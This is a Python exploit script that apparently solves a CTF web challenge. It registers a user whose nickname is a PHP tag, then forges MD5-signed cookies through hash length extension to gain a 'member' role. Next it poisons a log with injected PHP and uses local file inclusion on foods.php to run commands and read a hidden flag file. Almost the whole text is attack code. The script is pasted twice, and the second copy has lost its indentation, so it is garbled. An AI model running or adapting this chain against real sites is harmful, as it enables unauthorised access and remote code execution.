HarDToBelieve/exploit.py

## exploit.py
import requests
import sys
from subprocess import Popen, PIPE
import urllib
from base64 import b64decode, b64encode
from pprint import pprint

url = 'http://xxx.hardtobelieve.me/'   # Sorry I have to hide my challenge server, because this is a RCE challenge :D
proxy = {'http': 'http://localhost:8080'}
s = requests.Session()
# ---------------- Registration ----------------

reg_url = url + 'register.php'
data = {
	'username' : 'testExploit\n',
	'nickname' : '<?=//',
	'password' : 'testExploit'
}
result = s.post(reg_url, data=data)
if "id='error'" in result.text:
	print '[-] Register failed'
	sys.exit()
else:
	print '[+] Register successfully'

# ----------------------------------------------


# ---------------- Login ----------------

login_url = url + 'login.php'
data = {
	'username' : 'testExploit\n',
	'password' : 'testExploit'
}
result = s.post(login_url, data=data)
if 'Menu' not in result.text:
	print '[-] Login failed'
	sys.exit()
else:
	print '[+] Login successfully'

oldAuth = urllib.unquote(urllib.unquote(s.cookies.get_dict()['data']))
oldSig = s.cookies.get_dict()['signature']

print '[+] Old auth:', oldAuth
print '[+] Old Signature:', oldSig

# ----------------------------------------

# ---------------- Change role ----------------

process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
				'--secret-min', '1','--secret-max', \
				'20', '--append', ';role=member;suffix=hacked;', '--signature', oldSig, \
				'--format', 'md5'], stdout=PIPE, stderr=PIPE)

stdout, stderr = process.communicate()
index_url = url + 'index.php'

s = None
secret_len = None

for tries in stdout.split('\n\n')[:-1]:
	tmpDict = {}
	for line in tries.split('\n'):
		tmpVal = line.split(': ')
		tmpDict[tmpVal[0]] = tmpVal[1]

	s = requests.Session()
	s.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
	s.cookies.set('signature', tmpDict['New signature'])
	result = s.get(index_url, cookies=cookie)
	secret_len = tmpDict['Secret length']
	if 'member' in result.text:
		print '[+] New Signature:', tmpDict['New signature']
		print '[+] Got premium account'
		break

if s is None:
	print '[-] Cannot get premium account'
	sys.exit()

# print '[-] Debug:', b64encode(tmpDict['New string'].decode('hex'))
print secret_len
# ---------------------------------------------

# ---------------- Read file ----------------

def lfi(path, cmd=''):
	food_url = url + 'foods.php'
	param = {
		'page' : path
	}
	data = {
		'c' : cmd
	}
	process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
				'--secret', secret_len, '--append', ';role=member;suffix=poc;username=hacker', \
				'--signature', oldSig, \
				'--format', 'md5'], stdout=PIPE, stderr=PIPE)
	stdout, stderr = process.communicate()
	ss = requests.Session()

	tmpDict = {}
	for line in stdout.split('\n\n')[0].split('\n'):
		tmpVal = line.split(': ')
		tmpDict[tmpVal[0]] = tmpVal[1]

	ss.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
	ss.cookies.set('signature', tmpDict['New signature'])
	result = ss.post(food_url, params=param, data=data)
	return result.text

# --------------------------------------------

# ---------------- Inject code ----------------

log_path = 'GmQrH5RBZSGizH7EjLl'
log_file = 'testExploit\n_hacked'

# Use burp to modify method
s.post(url + "*index.php?*/['c']('cat</home/web300/I_am_SURE_you_cant_guess_this_file_N4M3');?>", proxies=proxy)

print lfi(log_path + '/' + log_file, 'exec')
	import requests
	import sys
	from subprocess import Popen, PIPE
	import urllib
	from base64 import b64decode, b64encode
	from pprint import pprint

	url = 'http://xxx.hardtobelieve.me/' # Sorry I have to hide my challenge server, because this is a RCE challenge :D
	proxy = {'http': 'http://localhost:8080'}
	s = requests.Session()
	# ---------------- Registration ----------------

	reg_url = url + 'register.php'
	data = {
	'username' : 'testExploit\n',
	'nickname' : '<?=//',
	'password' : 'testExploit'
	}
	result = s.post(reg_url, data=data)
	if "id='error'" in result.text:
	print '[-] Register failed'
	sys.exit()
	else:
	print '[+] Register successfully'

	# ----------------------------------------------


	# ---------------- Login ----------------

	login_url = url + 'login.php'
	data = {
	'username' : 'testExploit\n',
	'password' : 'testExploit'
	}
	result = s.post(login_url, data=data)
	if 'Menu' not in result.text:
	print '[-] Login failed'
	sys.exit()
	else:
	print '[+] Login successfully'

	oldAuth = urllib.unquote(urllib.unquote(s.cookies.get_dict()['data']))
	oldSig = s.cookies.get_dict()['signature']

	print '[+] Old auth:', oldAuth
	print '[+] Old Signature:', oldSig

	# ----------------------------------------

	# ---------------- Change role ----------------

	process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
	'--secret-min', '1','--secret-max', \
	'20', '--append', ';role=member;suffix=hacked;', '--signature', oldSig, \
	'--format', 'md5'], stdout=PIPE, stderr=PIPE)

	stdout, stderr = process.communicate()
	index_url = url + 'index.php'

	s = None
	secret_len = None

	for tries in stdout.split('\n\n')[:-1]:
	tmpDict = {}
	for line in tries.split('\n'):
	tmpVal = line.split(': ')
	tmpDict[tmpVal[0]] = tmpVal[1]

	s = requests.Session()
	s.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
	s.cookies.set('signature', tmpDict['New signature'])
	result = s.get(index_url, cookies=cookie)
	secret_len = tmpDict['Secret length']
	if 'member' in result.text:
	print '[+] New Signature:', tmpDict['New signature']
	print '[+] Got premium account'
	break

	if s is None:
	print '[-] Cannot get premium account'
	sys.exit()

	# print '[-] Debug:', b64encode(tmpDict['New string'].decode('hex'))
	print secret_len
	# ---------------------------------------------

	# ---------------- Read file ----------------

	def lfi(path, cmd=''):
	food_url = url + 'foods.php'
	param = {
	'page' : path
	}
	data = {
	'c' : cmd
	}
	process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
	'--secret', secret_len, '--append', ';role=member;suffix=poc;username=hacker', \
	'--signature', oldSig, \
	'--format', 'md5'], stdout=PIPE, stderr=PIPE)
	stdout, stderr = process.communicate()
	ss = requests.Session()

	tmpDict = {}
	for line in stdout.split('\n\n')[0].split('\n'):
	tmpVal = line.split(': ')
	tmpDict[tmpVal[0]] = tmpVal[1]

	ss.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
	ss.cookies.set('signature', tmpDict['New signature'])
	result = ss.post(food_url, params=param, data=data)
	return result.text

	# --------------------------------------------

	# ---------------- Inject code ----------------

	log_path = 'GmQrH5RBZSGizH7EjLl'
	log_file = 'testExploit\n_hacked'

	# Use burp to modify method
	s.post(url + "index.php?/['c']('cat</home/web300/I_am_SURE_you_cant_guess_this_file_N4M3');?>", proxies=proxy)

	print lfi(log_path + '/' + log_file, 'exec')